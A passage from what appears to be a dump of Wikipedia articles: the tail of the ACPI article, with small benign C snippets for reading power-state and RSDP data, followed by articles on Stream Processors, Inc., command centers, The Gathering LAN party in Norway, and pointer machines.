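        fputs(buf, stdout);   /* e.g. "button/power PBTN 00000080 00000001" */
    }
    close(fd);
    return 0;
}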
OSPM responsibilities
Once an OSPM-compatible operating system activates ACPI, it takes exclusive control of all aspects of power management and device configuration. The OSPM implementation must expose an ACPI-compatible environment to device drivers, which exposes certain system, device and processor states.
Power states
Global states
The ACPI Specification defines four global "Gx" states and six sleep "Sx" states for an ACPI-compliant computer system:
G0 (S0), Working: the system is fully operational.
G1, Sleeping: subdivided into the sleep states S1 (power-on suspend), S2 (CPU powered off), S3 (suspend to RAM, commonly known as standby) and S4 (suspend to disk, or hibernation).
G2 (S5), Soft Off: the system appears off, but some components remain powered so it can be woken by, for example, the power button or Wake-on-LAN.
G3, Mechanical Off: power has been completely removed, typically via a physical switch or by unplugging the power supply.
The specification also defines a Legacy state: the state of an operating system which does not support ACPI. In this state, the hardware and power are not managed via ACPI, effectively disabling ACPI.
Device states
The device states D0–D3 are device dependent:
D0 or Fully On is the operating state.
As with S0ix, Intel has D0ix states for intermediate levels on the SoC.
D1 and D2 are intermediate power-states whose definition varies by device.
D3: The D3 state is further divided into D3 Hot (has auxiliary power), and D3 Cold (no power provided):
Hot: A device can assert power management requests to transition to higher power states.
Cold or Off has the device powered off and unresponsive to its bus.
Processor states
The CPU power states C0–C3 are defined as follows:
C0 is the operating state.
C1 (often known as Halt) is a state where the processor is not executing instructions, but can return to an executing state essentially instantaneously. All ACPI-conformant processors must support this power state. Some processors, such as the Pentium 4 and AMD Athlon, also support an Enhanced C1 state (C1E or Enhanced Halt State) for lower power consumption, however this proved to be buggy on some systems.
C2 (often known as Stop-Clock) is a state where the processor maintains all software-visible state, but may take longer to wake up. This processor state is optional.
C3 (often known as Sleep) is a state where the processor does not need to keep its cache coherent, but maintains other state. Some processors have variations on the C3 state (Deep Sleep, Deeper Sleep, etc.) that differ in how long it takes to wake the processor. This processor state is optional.
Additional states are defined by manufacturers for some processors. For example, Intel's Haswell platform has states up to C10, where it distinguishes core states and package states.
Performance state
While a device or processor operates (D0 and C0, respectively), it can be in one of several power-performance states. These states are implementation-dependent. P0 is always the highest-performance state, with P1 to Pn being successively lower-performance states, up to an implementation-specific limit of n no greater than 16.
P-states have become known as SpeedStep in Intel processors, as PowerNow! or Cool'n'Quiet in AMD processors, and as PowerSaver in VIA processors.
P0 maximum power and frequency
P1 less than P0, voltage and frequency scaled
P2 less than P1, voltage and frequency scaled
Pn less than P(n–1), voltage and frequency scaled
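On Linux, ACPI-defined P-states are typically surfaced through the cpufreq subsystem (for example by the acpi-cpufreq driver). A minimal sketch, assuming that driver and the standard sysfs paths, which lists the available frequencies and the one currently in use:
/* Sketch: list P-state frequencies exposed by Linux cpufreq (assumes the
   acpi-cpufreq driver and standard sysfs paths; intel_pstate systems differ). */
#include <stdio.h>

static void print_file(const char *label, const char *path)
{
    char buf[512];
    FILE *f = fopen(path, "r");
    if (f && fgets(buf, sizeof(buf), f))
        printf("%s: %s", label, buf);
    if (f)
        fclose(f);
}

int main(void)
{
    print_file("available kHz",
               "/sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies");
    print_file("current kHz",
               "/sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq");
    return 0;
}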
Hardware interface
ACPI-compliant systems interact with hardware through either a "Function Fixed Hardware (FFH) Interface", or a platform-independent hardware programming model which relies on platform-specific ACPI Machine Language (AML) provided by the original equipment manufacturer (OEM).
Function Fixed Hardware interfaces are platform-specific features, provided by platform manufacturers for the purposes of performance and failure recovery. Standard Intel-based PCs have a fixed function interface defined by Intel, which provides a set of core functionality that reduces an ACPI-compliant system's need for full driver stacks for providing basic functionality during boot time or in the case of major system failure.
ACPI Platform Error Interface (APEI) is a specification for reporting hardware errors (e.g., from the chipset or RAM) to the operating system.
Firmware interface
ACPI defines many tables that provide the interface between an ACPI-compliant operating system and system firmware (BIOS or UEFI). This includes RSDP, RSDT, XSDT, FADT, FACS, DSDT, SSDT, MADT, and MCFG, for example.
The tables allow description of system hardware in a platform-independent manner, and are presented as either fixed-formatted data structures or in AML. The main AML table is the DSDT (differentiated system description table). The AML can be decompiled by tools like Intel's iASL (open-source, part of ACPICA) for purposes like patching the tables for expanding OS compatibility.
The Root System Description Pointer (RSDP) is located in a platform-dependent manner, and describes the rest of the tables.
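A sketch of the RSDP layout as a packed C structure, following the field order given in the ACPI specification (the fields after rsdt_address exist only in revision 2 and later):
/* Root System Description Pointer (RSDP) layout, per the ACPI specification.
   The fields after rsdt_address are present only when revision >= 2. */
#include <stdint.h>

struct acpi_rsdp {
    char     signature[8];       /* "RSD PTR " */
    uint8_t  checksum;           /* covers the first 20 bytes (ACPI 1.0 part) */
    char     oem_id[6];
    uint8_t  revision;           /* 0 = ACPI 1.0, 2 = ACPI 2.0 and later */
    uint32_t rsdt_address;       /* 32-bit physical address of the RSDT */
    /* ACPI 2.0+ extension */
    uint32_t length;             /* size of the entire table in bytes */
    uint64_t xsdt_address;       /* 64-bit physical address of the XSDT */
    uint8_t  extended_checksum;  /* covers the whole table */
    uint8_t  reserved[3];
} __attribute__((packed));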
Security risks
Ubuntu founder Mark Shuttleworth has likened ACPI to Trojan horses. He has described proprietary firmware (ACPI-related or any other firmware) as a security risk, saying that "firmware on your device is the NSA's best friend" and calling firmware (ACPI or non-ACPI) "a Trojan horse of monumental proportions". He has pointed out that low quality, closed source firmware is a major threat to system security: "Your biggest mistake is to assume that the NSA is the only institution abusing this position of trust – in fact, it's reasonable to assume that all firmware is a cesspool of insecurity, courtesy of incompetence of the highest degree from manufacturers, and competence of the highest degree from a very wide range of such agencies." As a solution to this problem, he has called for open-source, declarative firmware (ACPI or non-ACPI), which instead of containing executable code, only describes "hardware linkage and dependencies".
A custom ACPI table called the Windows Platform Binary Table (WPBT) is used by Microsoft to allow vendors to add software into the Windows OS automatically. Some vendors, such as Lenovo and Samsung, have been caught using this feature to install harmful software such as Superfish. Windows versions older than Windows 7 do not support this feature, but alternative techniques can be used. This behavior has been compared to rootkits.
See also
Active State Power Management
Coreboot
Green computing
Power management keys
Unified Extensible Firmware Interface
Wake-on-LAN
SBSA
References
External links
(UEFI and ACPI specifications)
Everything You Need to Know About the CPU C-States Power Saving Modes
Sample EFI ASL code used by VirtualBox; EFI/ASL code itself is from the open source Intel EFI Development Kit II (TianoCore)
ACPICA
BIOS
Unified Extensible Firmware Interface
Application programming interfaces
Computer hardware standards
Open standards
Electric power
System administration
|
13931621
|
https://en.wikipedia.org/wiki/Stream%20Processors%2C%20Inc
|
Stream Processors, Inc
|
Stream Processors, Inc was a Silicon Valley-based fabless semiconductor company specializing in the design and manufacture of high-performance digital signal processors for applications including video surveillance, multi-function printers and video conferencing. The company ceased operations in 2009.
Company history
Foundational work in stream processing was initiated in 1995 by a research team led by MIT professor Bill Dally. In 1996, he moved to Stanford University where he continued this work, receiving a multimillion-dollar grant from DARPA, with additional resources from Intel and Texas Instruments, to fund the development of a project called "Imagine", the first stream processor chip and accompanying compiler tools.
The Imagine Project
The goal of the Imagine project was to develop a C-programmable signal and image processor intended to provide both the performance density and the efficiency of a special-purpose processor (such as a hard-wired ASIC). The project successfully demonstrated the advantages of stream processing. Details on the Imagine project and its results are posted on the Stanford Imagine project page. The work also showed that a number of applications, ranging from wireless baseband processing, 3D graphics, encryption and IP forwarding to video processing, could take advantage of the efficiency of stream processing. This research inspired other designs such as GPUs from ATI Technologies as well as the Cell microprocessor from Sony, Toshiba, and IBM.
The main deliverables from the Imagine program included:
The Imagine Stream Architecture
The Stream programming model
Software development tools
Programmable graphics and real-time media applications
VLSI prototype (fabricated by TI)
Stream processor development platform (a prototype development board)
SPI established
Dally, together with other team members, obtained a license from Stanford to commercialize the resulting technology. Stream Processors, Incorporated (SPI) was incorporated in California in 2004. Professor Dally remained at Stanford, and the company hired industry veteran Chip Stearns as President and CEO in December of that year. Through June 2006, SPI raised a total of $26 million from a trio of notable venture capital firms: Austin Ventures, Norwest Venture Partners and the Woodside Fund.
The company launched its first two products concurrently with the International Solid State Circuits Conference (ISSCC) in February 2006 and introduced two others afterwards.
SPI was headquartered in Sunnyvale, California, with a software development group (SPI Software Technologies Pvt. Ltd) located in Bangalore, India.
In January 2009, co-founder Prof. Bill Dally accepted a position as Chief Scientist with NVIDIA Corporation, and at the same time resigned as chairman. In an interview, Dally reflected on his experiences with startups:
" I have done several chip startups myself. It’s getting hard. The ante is very high. If you do a chip startup, you need patient investors with very deep pockets. It’s many tens of millions of dollars to get to a first product and $50 million to get to profits. That’s very difficult to do because investors want an exit some multiple over that investment. I am hoping we return to the days of frequent IPOs and get beyond the fire-sale acquisitions. That’s not what you can see right now. If it’s a programmable chip, the cost is even more."
In the summer of 2009 CEO Stearns left the company and was replaced by Mike Fister, an executive with senior level experience at Cadence Design Systems and Intel.
In September 2009 the company ceased operations.
Technology
Similar to graphics and scientific computing, media and signal processing are characterized by available data-parallelism, locality and a high ratio of computation to global memory access. Stream processing exploits these characteristics using data-parallel processing fed by a distributed memory hierarchy managed by the compiler. The main challenge for next-generation massively parallel processors is data bandwidth, not computational resources. Unlike most conventional processors, the technology does not rely on a hardware cache; instead, data movement is explicitly managed by the compiler and hardware.
The execution model is based on accelerating performance-critical functions (kernels) that process and produce data records (streams). Kernels and streams are scheduled at compile time and moved to on-chip memory at runtime via a scoreboard. The compiler analyses the lifetimes of streams to optimize allocation and minimize external memory bandwidth needs. Stream and kernel loads can overlap with execution to improve latency tolerance, and the explicit data movement provides predictable performance. There are no CPU cache misses, and the design presents a single-core model to the programmer; data-parallelism is contained within the kernels.
Architecture
The architecture includes a host CPU (System MIPS) for system-level tasks and a DSP Coprocessor Subsystem, where the DSP MIPS runs the main threads that make kernel function calls to the Data Parallel Unit (DPU). For users that use libraries and do not intend to develop DSP code, the architecture is a MIPS-based system-on-a-chip with an API to a “black box” coprocessor. The DPU Dispatcher receives kernel function calls to manage runtime kernel and stream loads. One kernel at a time is executed across the lanes, operating on local stream data stored in the Lane Register File of each lane. Each lane has a set of VLIW ALUs and distributed operand register files (ORFs) that allow for a large working data set and processing bandwidth exceeding 1 terabyte/s. The Stream Load/Store Unit provides gather/scatter with a wide variety of access patterns. The InterLane Switch is a compiler-scheduled, full crossbar for high-speed access between lanes.
Tools
SPI's RapiDev Tools Suite leverages the predictability of stream processing to provide a fast path to optimized results using C programming. Starting with C reference code, the Fast Functional Debugger (FFD) library plugs into standard tools, such as Microsoft Visual Studio and GNU, and simulates the DPU to support restructuring code into kernels and streams. Because kernels are statically scheduled and data movement is explicit, DPU cycle-accuracy can be obtained even at this functional high level. This is one source of the predictability of the architecture. For targeting code to the device, the Stream Processor Compiler (SPC) generates the VLIW executable and pre-processed C code that is compiled and linked via standard GCC for MIPS. SPC allocates streams in the Lane Register Files and provides dependency information for the kernel function calls. Software pipelining and loop unrolling are supported. Branch penalties are avoided by predicated selects, and larger conditionals use conditional streams. Running under Eclipse, the Target Code Simulator provides comprehensive host or device binary code simulation with breakpoint and single-stepping capabilities, along with bandwidth and load statistics. A kernel view shows the VLIW pipeline for kernel optimizations, and a stream view shows kernel execution and stream loads to review global data movement for system profiling.
Products
SPI marketed its Storm-1 family, which included four fully software-programmable DSPs of varying performance levels.
Note: GMACS stands for Giga (billions of) Multiply-Accumulate operations per Second, a common measure of DSP performance.
Support hardware and software
The RapiDev tools suite delivers a fast, predictable path to optimized results, eliminating the complexities of assembly coding or manual cache management
The Storm-1 DevKit is a PCI-based software development platform
IP Camera Reference Design runs standard Linux 2.6 and supports multiple simultaneous codecs (e.g. H.264, MPEG-4 and MJPEG), arbitrary resolutions, CMOS and CCD sensor processing as well as video analytics in a fully software programmable platform
Video Streamer Reference Design supports eight 4CIF input channels of video compressed to H.264 and a Gigabit Ethernet output
References
External links
The Imagine Project (Stanford) website
Fabless semiconductor companies
Electronics companies established in 2004
Companies based in Sunnyvale, California
Defunct semiconductor companies of the United States
|
2736110
|
https://en.wikipedia.org/wiki/Command%20center
|
Command center
|
A command center (often called a war room) is any place that is used to provide centralized command for some purpose.
While frequently considered to be a military facility, these can be used in many other cases by governments or businesses. The term "war room" is also often used in politics to refer to teams of communications people who monitor and listen to the media and the public, respond to inquiries, and synthesize opinions to determine the best course of action.
If all functions of a command center are located in a single room, this is often referred to as a control room. However, in business management teams, the term "war room" is still frequently used, especially when the team is focusing on the strategy and tactics necessary to accomplish some goal the business finds important. A war room in many cases differs from a command center because one may be formed to deal with a particular crisis, such as sudden unfavorable media coverage, and is convened in order to brainstorm ways to deal with it. A large corporation can have several war rooms to deal with different goals or crises.
A command center enables an organization to function as designed, to perform day-to-day operations regardless of what is happening around it, in a manner in which no one realizes it is there but everyone knows who is in charge when there is trouble.
Conceptually, a command center is a source of leadership and guidance to ensure that service and order is maintained, rather than an information center or help desk. Its tasks are achieved by monitoring the environment and reacting to events, from the relatively harmless to a major crisis, using predefined procedures.
Types of command centers
There are many types of command centers. They include:
Data center management Oversees the central management and operating control for the computer systems that are essential to most businesses, usually housed in data centers and large computer rooms.
Business application management Ensures applications that are critical to customers and businesses are always available and working as designed.
Civil management Oversees the central management and control of civil operational functions. Staff members in those centers monitor the metropolitan environment to ensure the safety of people and the proper operation of critical government services, adjusting services as required and ensuring proper constant movement.
Emergency (crisis) management Directs people, resources, and information, and controls events to avert a crisis/emergency and minimize/avoid impacts should an incident occur.
Types of command and control rooms and their responsibilities
Command Center (CC or ICC)
Data center, computer system, incident response
Network Operation Centers (NOC)
Network equipment and activity
Tactical Operation Centers (TOC)
Military operations
Police and intelligence
Security Operation Centers (SOC)
Security agencies
Government agencies
Traffic management
CCTV
Emergency Operation Centers (EOC)
Emergency services
Combined Operation Centers (COS)
Air traffic control
Oil and gas
Control rooms
Broadcast
Audio Visual (AV)
Simulation and training
Medical
Social Media Command Center
Monitoring, posting and responding on social media sites
Military and government
A command center is a central place for carrying out orders and for supervising tasks, also known as a headquarters, or HQ.
Common to every command center are three general activities: inputs, processes, and outputs. The inbound aspect is communications (usually intelligence and other field reports). Inbound elements are "sitreps" (situation reports of what is happening) and "progreps" (progress reports relative to a goal that has been set) from the field back to the command element.
The process aspect involves a command element that makes decisions about what should be done about the input data. In the US military, the command element consists of a field-grade (Major to Colonel) or flag-grade (General) commissioned officer with one or more advisers. The outbound communications then deliver command decisions (i.e., operating orders) to the field elements.
Command centers should not be confused with the high-level military formation of a Command; as with any formation, Commands may be controlled from a command center, but not all formations controlled from a command center are Commands.
Examples
Canada
During the Cold War, the Government of Canada undertook the construction of "Emergency Government Headquarters", to be used in the event of nuclear warfare or other large-scale disaster. Canada was generally allied with the United States for the duration of the war, was a founding member of NATO, allowed American cruise missiles to be tested in the far north, and flew sovereignty missions in the Arctic.
For these reasons, the country was often seen as being a potential target of the Soviets at the height of nuclear tensions in the 1960s. Extensive post-attack plans were drawn up for use in emergencies, and fallout shelters were built all across the country for use as command centres for governments of all levels, the Canadian Forces, and rescue personnel, such as fire services.
Different levels of command centres included:
CEGF, Central Emergency Government Facility, located in Carp, Ontario, near the National Capital Region. Designed for use by senior federal politicians and civil servants.
REGHQ, Regional Emergency Government Headquarters, of which there were seven, spread out across the country.
MEGHQ, Municipal Emergency Government Headquarters
ZEGHQ, Zone Emergency Government Headquarters, built within the basements of existing buildings, generally designed to hold around 70 staff.
RU, Relocation Unit, or CRU, Central Relocation Unit. Often bunkers built as redundant backups to REGHQs and MEGHQs were given the RU designation.
Serbia
Joint Operations Command (JOC) is the organizational unit of the Serbian Armed Forces directly subordinated to the General Staff of the Armed Forces. The main duty of the Command is to conduct operational command over the Armed Forces. The Operations Command has a flexible formation, which is expanded by the representatives of other organizational units of the General Staff, and, if there is a need, operational level commands. In peacetime, the commander of the Joint Operations Command is at the same time Deputy of Serbian Armed Forces General Staff.
United Kingdom
Constructed in 1938, the Cabinet War Rooms were used extensively by Sir Winston Churchill during the Second World War.
United States
A Command and Control Center is a specialized type of command center operated by a government or municipal agency 24 hours a day, 7 days a week. Various branches of the U.S. military, such as the U.S. Coast Guard and the U.S. Navy, have command and control centers.
They are also common in many large correctional facilities. A Command and Control Center operates as the agency's dispatch center, surveillance monitoring center, coordination office, and alarm monitoring center all in one.
Command and control centers are not staffed by high-level officials but rather by highly skilled technical staff. When a serious incident occurs the staff will notify the agency's higher level officials.
In service businesses
A command center enables the real-time visibility and management of an entire service operation. Similar to an air traffic control center, a command center allows organizations to view the status of global service calls, service technicians, and service parts on a single screen. In addition, customer commitments or service level agreements (SLAs) that have been made can also be programmed into the command center and monitored to ensure all are met and customers are satisfied.
A command center is well suited for industries where coordinating field service (people, equipment, parts, and tools) is critical. Some examples:
Intel's security Command Center
Dell's Enterprise Command Center
NASA's Mission Control Houston Command Center for Space Shuttle and ISS
War rooms can also be used for defining strategies, or driving business intelligence efforts.
See also
Air traffic control
Air Defense Control Center
Combat Information Center
Control room
C4ISTAR
Dispatch
Mission Control Center
Network Operations Center
Obeya
White House Situation Room
References
External links
Command Center Handbook
Corporate governance
Military command and control installations
Military communications
Military locations
Nuclear command and control
Organizational structure
|
457118
|
https://en.wikipedia.org/wiki/The%20Gathering%20%28LAN%20party%29
|
The Gathering (LAN party)
|
The Gathering (abbreviated TG) is the second-largest computer party in the world (after DreamHack). It is held annually at the Vikingskipet Olympic Arena in Hamar, Norway, and lasts for five consecutive days, starting on the Wednesday before Easter each year. Each year TG attracts more than 5200 (mostly young) people, with attendance increasing every year. As of April 2012, The Gathering holds the world record for the fastest Internet connection, at 200 gigabits per second.
History
Beginning
In early 1991, Vegard Skjefstad and Trond Michelsen, members of the demogroup Deadline, decided that they wanted to organize a big demoparty in Norway. In the late eighties and early nineties it was common for demoparties (more commonly called "copyparties" at the time) to be organized by large demogroups. Because of this, and because Deadline was not particularly well known, Skjefstad suggested that the group Crusaders should be involved. At the time, The Crusaders was one of Norway's most popular Amiga groups, partly because of their music disks but also because of their diskmag, the Crusaders Eurochart. At first the Crusaders were not keen on the idea of organizing a party, but when Skjefstad reminded them that they always complained about other parties of the same sort, and that this was their chance to show everyone how it should be done, they agreed.
After briefly considering holding the party in the fall of 1991, it was decided that Easter would be better. All schools are closed during Easter week, and the days from Maundy Thursday to Easter Monday are official holidays in Norway. This meant that most of the target audience would have time off to attend TG, and the organizers and crew could work full-time on TG with minimal use of vacation days.
1992–1995
In 1992, 1100 people gathered in Skedsmohallen at Lillestrøm, far more than the expected 800 or so. In the following years, TG continued to grow. In 1993 Skedsmohallen was again the venue, with 1400 people visiting the party. This was more than the capacity of the venue, making it clear that a bigger venue was required. In 1994 the venue was Rykkinnhallen in Bærum, and the visitor count had risen to 1800, again more than the venue could hold, which led the local fire department to intervene and ban indoor sleeping. Consequently, the organizers had to hire a large construction tent and some heavy-duty heating equipment (there was still snow on the ground).
No bigger venue could be found, and this may have been one reason why Skjefstad and The Crusaders declined to arrange the party in 1995. A group from Stavanger led by Magnar Harestad proposed to host the party instead, and got approval and some backing from the TG crew. They hired Stavanger Ishall, "Siddishallen", and the party was renamed "Gathering 95". However, this caused a sharp drop in attendance: barely 500 people attended, not even filling the hall to half its capacity. This may have been due to moving the event away from the eastern, more densely populated part of Norway; while the previous events had been held well within an hour's drive of the capital, Oslo, Stavanger is over 470 km from Oslo, more than a 7-hour drive.
1996–present
Meanwhile, the venues built for the 1994 Winter Olympics had become available for hire, at increasingly reasonable prices due to lack of interest. Among these was the Vikingskipet ice skating arena in Hamar, at the time Norway's largest indoor arena, within a reasonable driving distance of central Oslo and with good infrastructure (power, parking etc.). Skjefstad and The Crusaders decided to rent it and have another go, and The Gathering 1996 attracted around 2500 visitors.
The organizers then decided to create a separate organization, KANDU (Kreativ, Aktiv Norsk Dataungdom - 'Creative, Active Norwegian Computer Youth') for the specific purpose of running TG every year, and thus promote creativity and computer literacy.
Since then The Gathering has continued to grow. By 1998 the maximum capacity of Vikingskipet, about 5200 attendees, was reached. KANDU has not, however, decided to switch venues again, although even larger venues such as the Telenor Arena at Fornebu outside Oslo have since become available. Instead, tickets for the event have sold out increasingly quickly.
The Gathering 2020 was cancelled after recommendations by local health authorities due to the COVID-19 pandemic. Instead, it was to be arranged online under the hashtag TG:Online.
Daily life
TG lasts for five days (from Holy Wednesday to Easter Sunday every year) and is both longer and bigger than most other computer parties. Most people let their daily rhythm go and sleep as they see fit (some simply in front of their computer, but most on the arena stands). Much of the time is spent in front of a computer, but many also use the opportunity to meet new or old friends in real life.
People have wildly different opinions about what constitutes a proper LAN party; the common trend at TG in recent years seems to be warez, games (the most popular being Counter-Strike), and IRC. However, many visitors find this too boring in the long run, and there are many unofficial mini-events happening all the time. Informal competitions to build the highest tower of soda cans are not uncommon, and people have been spotted holding their own private mini-rave parties, put together by a few people with a PC and a PA system.
Happenings and the demoscene
TG has always been a hub for young creative people to battle it out in many types of competitions; demo coding, music, graphics, animation, games, hardware-modification and Dance Dance Revolution to name a few; in addition, there are usually concerts and other things happening live on stage once or twice a day, as well as seminars etc.
In the first years the focus at TG was mostly on demos, but as TG is held at the same time as Breakpoint, a German scene-only party (and the earlier Mekka & Symposium), many European demosceners have left TG in favour of BP, and TG, like the majority of other computer parties, has become more of a gamer event. The scene at TG still lives on, though, as TG has introduced features such as a demoscene-only area, "creative cashback" (those handing in entries to the creative competitions get a discount) and other demo-oriented events. In fact, the number of entries handed in to the creative competitions at TG04 was the highest since 1996.
Crew
The organization Kreativ Aktiv Norsk Dataungdom (KANDU) is formally responsible for hosting TG. In addition, there are around 500 volunteers participating to make TG possible every year; these are collectively called the crew.
The TG crew is split into multiple sub-crews, such as a demo crew (Event:Demo), a game crew (Event:Game), a first-aid crew (Security:Medic), a network crew (Tech:Net), a server crew (Tech:Server), and a logistics crew (Core:Logistikk). (The exact list varies somewhat from year to year.) Each of these has a chief who reports upwards and is responsible for some aspect of the party.
All crew members are volunteers and unpaid; the only advantages a crew member has over a normal visitor are free entrance, access to a crew-only sleeping room and hot food served a few times a day. All members of the crew must arrive at the party place one day before the party itself starts, and stay one day after the party to aid in cleaning up afterwards. (Some people, such as chiefs, typically come even sooner.)
Anyone who wants to can become crew (except for the security and logistics crews, where there is a minimum age of 18) by applying through a special interface called wannabe. The chiefs usually pick their own crew, based on the applications coming in and on previous experience. Crew members from earlier years must re-apply every year if they want to be crew again, but it is rare for a person who has done a good job not to be selected the next year.
Ticket sale controversy
Up to and including TG01, TG tickets (as all other tickets to everything else happening in Vikingskipet) were sold by Billettservice, a company closely related to the postal service in Norway. Partly sold via the Internet, partly by phone (but always picked up at a local post office), the Billettservice system broke down hard every year as thousands of people tried to order tickets to the event simultaneously.
To try to make the ticket sales smoother, a group of people closely related to the administration of TG formed a separate company called Partyticket (or Partyticket.net, PTN for short), selling unified ticket-related services (such as ordering, payment, seating and competition handling) to smaller and larger computer parties. Partyticket went online for the first time in 2002 and, like Billettservice, instantly went down under the massive load, partly due to a problem at the third-party service authorizing credit card transactions. However, the tickets still sold out in a matter of hours.
2003 was not much better; many problems had been fixed (and PTN had successfully managed the ticket sales for several other computer parties), but some remained, and it was decided to postpone the ticket sales by one day to fix the problems that had been discovered. The sales went relatively smoothly the next day.
In 2004 it was hoped that the problems would finally be over, especially as a new queuing system and new hardware were installed; however, the server again buckled under the enormous load, and the queuing system was found to be severely buggy, apparently shuffling people around in the queue at random. This frustrated many visitors, some of whom never got tickets at all. Many people blamed the ticket-sales problems directly on PTN and tried to pressure TG into choosing some other solution.
In 2005 the queuing system was changed. Instead of buying actual tickets, people were put in a virtual queue, which loaded the server far less during the peak hours. The next day, people were processed from the front of the queue (no more than 200 at a time). This system worked much better than the 2004 queuing system, despite some misconceptions in the media.
Since 2006, however, there have been no major issues.
In 2007 the Norwegian Tax Authority demanded that taxes be paid on the tickets sold from 2001 to 2008, as it did not consider The Gathering to be a cultural event (cultural events in Norway are exempt from such taxes). Although the management of TG sent a complaint to the Tax Authority, it did not reconsider the demand. The management of TG was required to pay 988,536 NOK in unpaid taxes by August 8, which could have caused the 2009 staging of The Gathering to be cancelled. If the money was not paid by the deadline, the event could have been closed for good. However, on August 16, 2008, KANDU and The Gathering won the tax case and were temporarily exempted from paying taxes on the tickets sold in 2006, 2007, 2008 and onwards. The law was also to be amended to secure this for all other computer parties in Norway. The stated reason for the decision is that The Gathering's purpose is to gather youth from Norway and abroad so that they can get together to cultivate a computer culture, and the Storting has declared in a white paper that computer gaming is considered culture.
For The Gathering 2011, KANDU signed an agreement for ticket sales with a company called Unicornis and their ticket system Geekevents. This agreement was for a three-year period.
KANDU has since signed a new contract with Geekevents AS for a four-year period.
Name
Most years, TG has a name or "tagline"; the tagline does not mean much in itself, but it influences the logo (or the other way round) and some other material.
Demo and intro competition winners
References
Tasajarvi, Lassi (2004). Demoscene: The Art of Real-time. Even Lake Studios. pp. 45–54.
External links
The Gathering official website
KANDU website
The Gathering on Pouët
The Gathering: Computer Parties as Means for Gender Inclusion by Hege Nordli, an academic paper about The Gathering demo party and parties in general. (PDF)
Various logos
Demo parties
LAN parties
Festivals in Norway
Culture in Hedmark
Recurring events established in 1992
1992 establishments in Norway
Spring (season) events in Norway
|
6144616
|
https://en.wikipedia.org/wiki/Pointer%20machine
|
Pointer machine
|
In theoretical computer science, a pointer machine is an "atomistic" abstract computational machine model akin to the random-access machine. A pointer algorithm is an algorithm restricted to the pointer machine model.
Depending on the type, a pointer machine may be called a linking automaton, a KU-machine, an SMM, an atomistic LISP machine, a tree-pointer machine, etc. (cf. Ben-Amram 1995). At least three major varieties exist in the literature: the Kolmogorov-Uspenskii model (KUM, KU-machine), the Knuth linking automaton, and the Schönhage Storage Modification Machine model (SMM). The SMM seems to be the most common.
From its "read-only tape" (or equivalent) a pointer machine receives input—bounded symbol-sequences ("words") made of at least two symbols e.g. { 0, 1 } -- and it writes output symbol-sequences on an output "write-only" tape (or equivalent). To transform a symbol-sequence (input word) to an output symbol-sequence the machine is equipped with a "program"—a finite-state machine (memory and list of instructions). Via its state machine the program reads the input symbols, operates on its storage structure—a collection of "nodes" (registers) interconnected by "edges" (pointers labelled with the symbols e.g. { 0, 1 }), and writes symbols on the output tape.
Pointer machines cannot do arithmetic. Computation proceeds only by reading input symbols, modifying and doing various tests on its storage structure—the pattern of nodes and pointers, and outputting symbols based on the tests. "Information" is in the storage structure.
Types of "pointer machines"
Both Gurevich and Ben-Amram list a number of very similar "atomistic" models of "abstract machines"; Ben-Amram holds that the six "atomistic models" must be distinguished from "high-level" models. This article discusses the following three atomistic models in particular:
Schönhage's storage modification machines (SMM),
Kolmogorov–Uspenskii machines (KUM or KU-Machines),
Knuth's "linking automaton"
But Ben-Amram adds more:
Atomistic pure-LISP machine (APLM)
Atomistic full-LISP machine (AFLM),
General atomistic pointer machines,
Jones' I language (two types)
Problems with the pointer-machine model
Use of the model in complexity theory:
van Emde Boas (1990) expresses concern that this form of abstract model is:
"an interesting theoretical model, but ... its attractiveness as a fundamental model for complexity theory is questionable. Its time measure is based on uniform time in a context where this measure is known to underestimate the true time complexity. The same observation holds for the space measure for the machine" (van Emde Boas (1990) p. 35)
Gurevich 1988 also expresses concern:
"Pragmatically speaking, the Schönhage model provides a good measure of time complexity at the current state of the art (though I would prefer something along the lines of the random access computers of Angluin and Valiant)" (Gurevich (1988) p. 6 with reference to Angluin D. and Valiant L. G., "Fast Probabilistic Algorithms for Hamiltonian Circuits and Matchings", Journal of Computer and System Sciences 18 (1979) 155-193.)
The fact that, in §3 and §4 (pp. 494–497), Schönhage himself (1980) demonstrates the real-time equivalences of his two random-access machine models "RAM0" and "RAM1" leads one to question the necessity of the SMM for complexity studies.
Potential uses for the model: However, Schönhage (1980) demonstrates in his §6 that integer multiplication can be done in linear time. And Gurevich wonders whether or not the "parallel KU machine" "resembles somewhat the human brain" (Gurevich (1988) p. 5).
Schönhage's storage modification machine (SMM) model
Schönhage's SMM model seems to be the most common and most accepted. It is quite unlike the register machine model and other common computational models e.g. the tape-based Turing machine or the labeled holes and indistinguishable pebbles of the counter machine.
The computer consists of a fixed alphabet of input symbols, and a mutable directed graph (also known as its state diagram) with its arrows labelled by alphabet symbols. Each node of the graph has exactly one outgoing arrow labelled with each symbol, although some of these may loop back into the original node. One fixed node of the graph is identified as the start or "active" node.
Each word of symbols in the alphabet can then be translated to a pathway through the machine; for example, 10011 would translate to taking path 1 from the start node, then path 0 from the resulting node, then path 0, then path 1, then path 1. The path can, in turn, be identified with the resulting node, but this identification will change as the graph changes during the computation.
The machine can receive instructions which change the layout of the graph. The basic instructions are the new w instruction, which creates a new node which is the "result" of following the string w, and the set w to v instruction which (re)directs an edge to a different node. Here w and v represent words. v is a former word—i.e. a previously-created string of symbols—so that the redirected edge will point "backwards" to an old node that is the "result" of that string.
(1) new w: creates a new node. w represents the new word that creates the new node. The machine reads the word w, following the path represented by the symbols of w until the machine comes to the last, "additional" symbol in the word. The additional symbol instead forces the last state to create a new node, and "flip" its corresponding arrow (the one labelled with that symbol) from its old position to point to the new node. The new node in turn points all its edges back to the old last-state, where they just "rest" until redirected by another new or set. In a sense the new nodes are "sleeping", waiting for an assignment. In the case of the starting or center node we likewise would begin with both of its edges pointing back to itself.
Example: Let "w" be 10110[1], where the final character is in brackets to denote its special status. We take the 1 edge of the node reached by 10110 (at the end of a five-edge, hence six-node, pathway), and point it to a new 7th node. The two edges of this new node then point "backward" to the 6th node of the path.
(2) set w to v: redirects (moves) an edge (arrow) from the path represented by word w to a former node that represents word v. Again, it is the last arrow in the path that is redirected.
Example: Set 1011011 to 1011, after the above instruction, would change the 1 arrow of the new node at 101101 to point to the fifth node in the pathway, reached at 1011. Thus the path 1011011 would now have the same result as 1011.
